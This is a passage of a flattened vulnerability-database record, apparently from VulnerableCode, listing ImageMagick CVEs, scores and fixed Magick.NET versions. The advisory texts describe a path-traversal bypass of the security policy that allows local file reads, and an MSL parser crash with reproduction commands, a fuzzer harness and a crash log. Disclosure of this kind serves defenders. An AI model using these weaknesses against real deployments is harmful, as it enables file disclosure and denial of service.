0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5ggv-92r5-cp4p
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:48:08Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5ggv-92r5-cp4p
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30936
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30936
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445880
reference_id 2445880
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445880
9
reference_url https://github.com/advisories/GHSA-5ggv-92r5-cp4p
reference_id GHSA-5ggv-92r5-cp4p
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5ggv-92r5-cp4p
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-30936, GHSA-5ggv-92r5-cp4p
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g41y-dv8u-3yf1
30
url VCID-gdg8-aejn-83c4
vulnerability_id VCID-gdg8-aejn-83c4
summary 
ImageMagick: Policy bypass through path traversal allows reading restricted content despite secured policy
ImageMagick’s path security policy is enforced on the raw filename string before the filesystem resolves it. As a result, a policy rule such as /etc/* can be bypassed by a path traversal. The OS resolves the traversal and opens the sensitive file, but the policy matcher only sees the unnormalized path and therefore allows the read. This enables local file disclosure (LFI) even when policy-secure.xml is applied.

Actions to prevent reading from files have been taken. But it make sure writing is also not possible the following should be added to your policy:

```
<policy domain="path" rights="none" pattern="*../*"/>
```

And this will also be included in the project's more secure policies by default.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25965.json
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25965.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25965
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04488
published_at 2026-04-21T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04357
published_at 2026-04-18T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04348
published_at 2026-04-16T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04382
published_at 2026-04-13T12:55:00Z
4
value 0.00018
scoring_system epss
scoring_elements 0.04398
published_at 2026-04-12T12:55:00Z
5
value 0.00018
scoring_system epss
scoring_elements 0.04413
published_at 2026-04-11T12:55:00Z
6
value 0.00018
scoring_system epss
scoring_elements 0.04419
published_at 2026-04-09T12:55:00Z
7
value 0.00018
scoring_system epss
scoring_elements 0.04402
published_at 2026-04-08T12:55:00Z
8
value 0.00018
scoring_system epss
scoring_elements 0.04369
published_at 2026-04-07T12:55:00Z
9
value 0.00018
scoring_system epss
scoring_elements 0.04359
published_at 2026-04-04T12:55:00Z
10
value 0.00047
scoring_system epss
scoring_elements 0.14614
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25965
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25965
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25965
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8jvj-p28h-9gm7
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:28:41Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8jvj-p28h-9gm7
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25965
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25965
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442118
reference_id 2442118
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442118
9
reference_url https://github.com/advisories/GHSA-8jvj-p28h-9gm7
reference_id GHSA-8jvj-p28h-9gm7
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8jvj-p28h-9gm7
10
reference_url https://access.redhat.com/errata/RHSA-2026:5573
reference_id RHSA-2026:5573
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5573
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25965, GHSA-8jvj-p28h-9gm7
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gdg8-aejn-83c4
31
url VCID-h221-qd8d-tqa5
vulnerability_id VCID-h221-qd8d-tqa5
summary 
ImageMagick has a NULL pointer dereference in MSL parser via <comment> tag before image load
## Summary

NULL pointer dereference in MSL (Magick Scripting Language) parser when processing `<comment>` tag before any image is loaded.

## Version

- ImageMagick 7.x (tested on current main branch)
- Commit: HEAD

## Steps to Reproduce

### Method 1: Using ImageMagick directly

```bash
magick MSL:poc.msl out.png
```

### Method 2: Using OSS-Fuzz reproduce

```bash
python3 infra/helper.py build_fuzzers imagemagick
python3 infra/helper.py reproduce imagemagick msl_fuzzer poc.msl
```

Or run the fuzzer directly:
```bash
./msl_fuzzer poc.msl
```

## Expected Behavior

ImageMagick should handle the malformed MSL gracefully and return an error message.

## Actual Behavior

```
convert: MagickCore/property.c:297: MagickBooleanType DeleteImageProperty(Image *, const char *): Assertion `image != (Image *) NULL' failed.
Aborted
```

## Root Cause Analysis

In `coders/msl.c:7091`, `MSLEndElement()` calls `DeleteImageProperty()` on `msl_info->image[n]` when handling the `</comment>` end tag without checking if the image is NULL:

```c
if (LocaleCompare((const char *) tag,"comment") == 0 )
  {
    (void) DeleteImageProperty(msl_info->image[n],"comment");  // No NULL check
    ...
  }
```

When `<comment>` appears before any `<read>` operation, `msl_info->image[n]` is NULL, causing the assertion failure in `DeleteImageProperty()` at `property.c:297`.

## Impact

- **DoS**: Crash via assertion failure (debug builds) or NULL pointer dereference (release builds)
- **Affected**: Any application using ImageMagick to process user-supplied MSL files

## Fuzzer

This issue was discovered using a custom MSL fuzzer:

```cpp
#include <cstdint>
#include <Magick++/Blob.h>
#include <Magick++/Image.h>
#include "utils.cc"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size)
{
  if (IsInvalidSize(Size))
    return(0);
  try
  {
    const Magick::Blob blob(Data, Size);
    Magick::Image image;
    image.magick("MSL");
    image.fileName("MSL:");
    image.read(blob);
  }
  catch (Magick::Exception)
  {
  }
  return(0);
}
```

This issue was found by Team FuzzingBrain @ Texas A&M University
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23952.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23952.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-23952
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.0569
published_at 2026-04-21T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05517
published_at 2026-04-16T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05553
published_at 2026-04-07T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.0559
published_at 2026-04-08T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05615
published_at 2026-04-09T12:55:00Z
5
value 0.00021
scoring_system epss
scoring_elements 0.05586
published_at 2026-04-11T12:55:00Z
6
value 0.00021
scoring_system epss
scoring_elements 0.05576
published_at 2026-04-12T12:55:00Z
7
value 0.00021
scoring_system epss
scoring_elements 0.05569
published_at 2026-04-13T12:55:00Z
8
value 0.00021
scoring_system epss
scoring_elements 0.05525
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-23952
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23952
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23952
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T21:43:24Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5vx3-wx4q-6cj8
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T21:43:24Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5vx3-wx4q-6cj8
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126077
reference_id 1126077
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126077
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2431905
reference_id 2431905
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2431905
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-23952
reference_id CVE-2026-23952
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2026-23952
10
reference_url https://github.com/advisories/GHSA-5vx3-wx4q-6cj8
reference_id GHSA-5vx3-wx4q-6cj8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5vx3-wx4q-6cj8
11
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2zje-ag2v-7kac
4
vulnerability VCID-54da-fzyt-4ud2
5
vulnerability VCID-5uyd-bv33-h7g1
6
vulnerability VCID-5zkt-kcgx-a3e2
7
vulnerability VCID-62ar-kwbq-nyh3
8
vulnerability VCID-69f6-ceje-hyah
9
vulnerability VCID-6h7x-3rue-kucp
10
vulnerability VCID-6rma-wjdv-uqe9
11
vulnerability VCID-6ztv-auh8-27gx
12
vulnerability VCID-acsa-1uwk-fqee
13
vulnerability VCID-anyp-2jr7-73a1
14
vulnerability VCID-b5pd-kk97-gban
15
vulnerability VCID-bd1g-sfsp-37h7
16
vulnerability VCID-bw4q-dt1r-y3e4
17
vulnerability VCID-cbqr-aybx-d3e6
18
vulnerability VCID-cuhw-ew1g-s3h2
19
vulnerability VCID-d8yf-8rff-3yhf
20
vulnerability VCID-dabd-m3mf-3ker
21
vulnerability VCID-dtza-65ku-aber
22
vulnerability VCID-emmr-15qp-vfah
23
vulnerability VCID-f1zu-xb4j-8qhp
24
vulnerability VCID-fnck-7mvx-hqc9
25
vulnerability VCID-g41y-dv8u-3yf1
26
vulnerability VCID-gdg8-aejn-83c4
27
vulnerability VCID-jc5m-7rvc-2qg6
28
vulnerability VCID-jcjk-s89c-mbbm
29
vulnerability VCID-jvq6-xjbu-fkb9
30
vulnerability VCID-kdw5-8y5z-zya5
31
vulnerability VCID-kefv-kpkk-wudf
32
vulnerability VCID-mntx-6yku-3qcx
33
vulnerability VCID-n47w-r932-abey
34
vulnerability VCID-p5aw-n691-nkff
35
vulnerability VCID-pcme-bwan-3bcf
36
vulnerability VCID-r3vw-ncns-cqgb
37
vulnerability VCID-rbdg-vz8x-ykah
38
vulnerability VCID-rj9n-ra1t-77dy
39
vulnerability VCID-rjkf-pdny-2fhn
40
vulnerability VCID-sd54-b8z1-2fg7
41
vulnerability VCID-sd7w-6qv5-73ge
42
vulnerability VCID-sdc2-fcap-abaz
43
vulnerability VCID-sw7g-hxxr-n3e1
44
vulnerability VCID-tv15-dcnu-pbbn
45
vulnerability VCID-utfe-h3b7-jqcj
46
vulnerability VCID-uvpj-a8v5-ebgz
47
vulnerability VCID-vpdn-g1k9-1kdn
48
vulnerability VCID-x44m-x33k-hydn
49
vulnerability VCID-x8c6-9pse-xkc8
50
vulnerability VCID-xbsu-ac6g-53fn
51
vulnerability VCID-y4hn-6bv6-jugw
52
vulnerability VCID-y58b-be93-hbfd
53
vulnerability VCID-yx7r-r7ez-7uhp
54
vulnerability VCID-z9t9-bxf9-hkfk
55
vulnerability VCID-zab9-9tqj-hbhg
56
vulnerability VCID-zpcy-nms7-kuha
57
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
aliases CVE-2026-23952, GHSA-5vx3-wx4q-6cj8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-h221-qd8d-tqa5
32
url VCID-jc5m-7rvc-2qg6
vulnerability_id VCID-jc5m-7rvc-2qg6
summary 
ImageMagick has a heap-buffer-overflow in NewXMLTree which could result in crash
The NewXMLTree method contains a bug that could result in a crash due to an out of write bounds of a single zero byte.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32636.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32636.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32636
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04277
published_at 2026-04-18T12:55:00Z
1
value 0.00017
scoring_system epss
scoring_elements 0.04268
published_at 2026-04-16T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04297
published_at 2026-04-13T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.04318
published_at 2026-04-12T12:55:00Z
4
value 0.00017
scoring_system epss
scoring_elements 0.0426
published_at 2026-04-02T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.0434
published_at 2026-04-09T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.04324
published_at 2026-04-08T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.04293
published_at 2026-04-07T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.04281
published_at 2026-04-04T12:55:00Z
9
value 0.00017
scoring_system epss
scoring_elements 0.04332
published_at 2026-04-11T12:55:00Z
10
value 0.00019
scoring_system epss
scoring_elements 0.05103
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32636
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32636
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32636
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.11.0
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-19T14:54:31Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.11.0
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-17
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-19T14:54:31Z/
url https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-17
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gc62-2v5p-qpmp
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-19T14:54:31Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gc62-2v5p-qpmp
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32636
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32636
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2448862
reference_id 2448862
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2448862
10
reference_url https://github.com/advisories/GHSA-gc62-2v5p-qpmp
reference_id GHSA-gc62-2v5p-qpmp
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gc62-2v5p-qpmp
11
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.11.0
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.11.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.11.0
aliases CVE-2026-32636, GHSA-gc62-2v5p-qpmp
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jc5m-7rvc-2qg6
33
url VCID-jcjk-s89c-mbbm
vulnerability_id VCID-jcjk-s89c-mbbm
summary 
ImageMagick: Invalid MSL <map> can result in a use after free
The MSL interpreter crashes when processing a invalid `<map>` element that causes it to use an image after it has been freed.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26983.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26983.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-26983
reference_id
reference_type
scores
0
value 0.00016
scoring_system epss
scoring_elements 0.03771
published_at 2026-04-21T12:55:00Z
1
value 0.00016
scoring_system epss
scoring_elements 0.03649
published_at 2026-04-18T12:55:00Z
2
value 0.00016
scoring_system epss
scoring_elements 0.03638
published_at 2026-04-16T12:55:00Z
3
value 0.00016
scoring_system epss
scoring_elements 0.03661
published_at 2026-04-13T12:55:00Z
4
value 0.00016
scoring_system epss
scoring_elements 0.03687
published_at 2026-04-12T12:55:00Z
5
value 0.00016
scoring_system epss
scoring_elements 0.0371
published_at 2026-04-11T12:55:00Z
6
value 0.00016
scoring_system epss
scoring_elements 0.03752
published_at 2026-04-09T12:55:00Z
7
value 0.00016
scoring_system epss
scoring_elements 0.03729
published_at 2026-04-08T12:55:00Z
8
value 0.00016
scoring_system epss
scoring_elements 0.03726
published_at 2026-04-07T12:55:00Z
9
value 0.00016
scoring_system epss
scoring_elements 0.03701
published_at 2026-04-02T12:55:00Z
10
value 0.00016
scoring_system epss
scoring_elements 0.03712
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-26983
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26983
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26983
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/7cfae4da24a995fb05386d77364ff404a7cca7bc
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/7cfae4da24a995fb05386d77364ff404a7cca7bc
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-w8mw-frc6-r7m8
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:09:37Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-w8mw-frc6-r7m8
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-26983
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-26983
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442134
reference_id 2442134
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442134
10
reference_url https://github.com/advisories/GHSA-w8mw-frc6-r7m8
reference_id GHSA-w8mw-frc6-r7m8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w8mw-frc6-r7m8
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
